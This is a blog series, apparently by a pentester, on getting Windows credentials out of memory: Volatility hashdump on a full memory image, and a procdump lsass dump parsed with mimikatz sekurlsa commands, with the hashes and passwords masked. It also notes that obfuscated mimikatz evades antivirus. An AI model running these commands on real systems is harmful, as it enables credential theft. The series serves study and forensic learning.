Memdumps, Volatility, Mimikatz, VMs – Part 2: Windows 7 Full Memory Dump & Get Hashes

For this part we first make a memory dump with the moonsols dumit.exe tool (using my physical Windows 7 x64 machine):
dumpit0551934099191ca7d24e3bd4552ee139
The next steps are simple volatility calls, like getting the basic image information:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw imageinfo
Volatility Foundation Volatility Framework 2.5
INFO    : volatility.debug    : Determining profile based on KDBG search…
          Suggested Profile(s) : Win2008R2SP0x64, Win7SP1x64, Win7SP0x64, Win200
8R2SP1x64
                     AS Layer1 : AMD64PagedMemory (Kernel AS)
                     AS Layer2 : FileAddressSpace (C:\Users\dax\Downloads\volati
lity_2.5.win.standalone\DAXAMD-20160124-111555.raw)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf80002ff20f0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff80002ff3d00L
                KPCR for CPU 1 : 0xfffff880009e8000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2016-01-24 11:16:03 UTC+0000
     Image local date and time : 2016-01-24 12:16:03 +0100
Get the hivelist:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe -f DAXAMD-20160124-111555.raw hivelist –profile Win7SP1x64
Volatility Foundation Volatility Framework 2.5
Virtual            Physical           Name
—————— —————— —-
0xfffff8a00000f010 0x0000000153e5d010 [no name]
0xfffff8a0000231f0 0x0000000153e1f1f0 \REGISTRY\MACHINE\SYSTEM
0xfffff8a000062010 0x0000000150d76010 \REGISTRY\MACHINE\HARDWARE
0xfffff8a000121010 0x0000000149c8e010 \SystemRoot\System32\Config\SOFTWARE
0xfffff8a000d55010 0x0000000148258010 \Device\HarddiskVolume1\Boot\BCD
0xfffff8a000e04200 0x000000013b7ad200 \SystemRoot\System32\Config\DEFAULT
0xfffff8a001219010 0x0000000132d35010 \SystemRoot\System32\Config\SECURITY
0xfffff8a001290010 0x0000000131e09010 \SystemRoot\System32\Config\SAM
0xfffff8a00143c010 0x000000012fa23010 \??\C:\Windows\ServiceProfiles\NetworkServ
ice\NTUSER.DAT
0xfffff8a00151a240 0x000000012c2b9240 \??\C:\Windows\ServiceProfiles\LocalServic
e\NTUSER.DAT
0xfffff8a002261010 0x000000010db7f010 \??\C:\Users\dax\ntuser.dat
0xfffff8a0022f6410 0x0000000148132410 \??\C:\Users\dax\AppData\Local\Microsoft\W
indows\UsrClass.dat
0xfffff8a004e77010 0x0000000110fea010 \??\C:\System Volume Information\Syscache.
hve
0xfffff8a00ceae010 0x000000007eeb9010 \??\C:\Windows\System32\config\COMPONENTS
Help!
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.e
xe hashdump -h
Volatility Foundation Volatility Framework 2.5
Usage: Volatility – A memory forensics analysis platform.
Options:
  -h, –help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  –conf-file=.volatilityrc
                        User based configuration file
  -d, –debug           Debug volatility
  –plugins=PLUGINS     Additional plugin directories to use (semi-colon
                        separated)
  –info                Print information about all registered objects
  –cache-directory=C:\Users\dax/.cache\volatility
                        Directory where cache files are stored
  –cache               Use caching
  –tz=TZ               Sets the (Olson) timezone for displaying timestamps
                        using pytz (if installed) or tzset
  -f FILENAME, –filename=FILENAME
                        Filename to use when opening an image
  –profile=WinXPSP2x86
                        Name of the profile to load (use –info to see a list
                        of supported profiles)
  -l LOCATION, –location=LOCATION
                        A URN location from which to load an address space
  -w, –write           Enable write support
  –dtb=DTB             DTB Address
  –shift=SHIFT         Mac KASLR shift address
  –output=text         Output in this format (support is module specific, see
                        the Module Output Options below)
  –output-file=OUTPUT_FILE
                        Write output in this file
  -v, –verbose         Verbose information
  -g KDBG, –kdbg=KDBG  Specify a KDBG virtual address (Note: for 64-bit
                        Windows 8 and above this is the address of
                        KdCopyDataBlock)
  –force               Force utilization of suspect profile
  -k KPCR, –kpcr=KPCR  Specify a specific KPCR address
  –cookie=COOKIE       Specify the address of nt!ObHeaderCookie (valid for
                        Windows 10 only)
  -y SYS_OFFSET, –sys-offset=SYS_OFFSET
                        SYSTEM hive offset (virtual)
  -s SAM_OFFSET, –sam-offset=SAM_OFFSET
                        SAM hive offset (virtual)
Module Output Options: dot, greptext, html, json, sqlite, text, xlsx
———————————
Module HashDump
———————————
Dumps passwords hashes (LM/NTLM) from memory
What we need for getting the hashes:
y=virtual location of system
s=virtual location of sam
Dump the hashes:
C:\Users\dax\Downloads\volatility_2.5.win.standalone>volatility-2.5.standalone.exe hashdump -f DAXAMD-20160124-111555.raw –profile Win7SP1x64 -y 0xfffff8a0000231f0 -s 0xfffff8a001290010
Volatility Foundation Volatility Framework 2.5
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1001:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
HomeGroupUser$:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
otto:1007:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
__vmware_user__:1015:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
UpdatusUser:1016:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Link:

Memdumps, Volatility, Mimikatz, VMs – Part 1: Mimikatz & lsass.exe Dump

Part 1 is simple. Dump the lsass.exe process and use mimikatz for getting the credentials as clear text and the hashes. You need admin or system rights for this.
But as a short reminder first let’s have a look at the “normal” way for dumping credentials from the lsass.exe process with mimikatz:
mimikatz # privilege::debug
Privilege ’20’ OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
— cut —
If you do not have a self compiled or otherwise obfuscated mimikatz version every antivirus scanner will do its work. But it is also possible to read credentials from memory dump.
Make memory dump with Process explorer:
prxp624447fe299fa27348bebd7a23b30eb
… remember to make a full dump.
Or use procdump:
procdump -accepteula -ma lsass.exe lsass.dmp
which is much better for pentesters who only have access over a shell.
For dumping the credentials in clear text use mimikatz:
mimikatz # sekurlsa::minidump e:\lsass.dmp
Switch to MINIDUMP : ‘e:\lsass.dmp’
mimikatz # sekurlsa::logonPasswords
Opening : ‘e:\lsass.dmp’ file for minidump…
Authentication Id : 0 ; 534844 (00000000:0008293c)
Session           : Interactive from 0
User Name         : dax
Domain            : DAX-RYMZ48Z3EYO
Logon Server      : DAX-RYMZ48Z3EYO
Logon Time        : 23.01.2016 14:42:11
SID               : S-1-5-21-436374069-688789844-839522115-1003
        msv :
         [00000002] Primary
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * LM       : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * NTLM     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
         * SHA1     : XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
        wdigest :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
        kerberos :
         * Username : dax
         * Domain   : DAX-RYMZ48Z3EYO
         * Password : XXXXXXX
— cut —
Links:

Memdumps, Volatility, Mimikatz, VMs – Overview

The last weeks I experimented with how to get user crendentials from memory dumps, and hopefully I will have the time to contiue this little “research” (I know, it is not really research when you just writup stuff 😉 ). There are many different ways to dump credentials as hashes or in cleartext from various types of memory dumps, so I think that will become a few short articles. I added links for sources and more in depth information.
Highly interesting for me is how to obtain memory dumbs from virtual machines when you have access to the host system. Further I will have a look at countermeasures in a later part (whereby I mean monitoring and logging).
Overview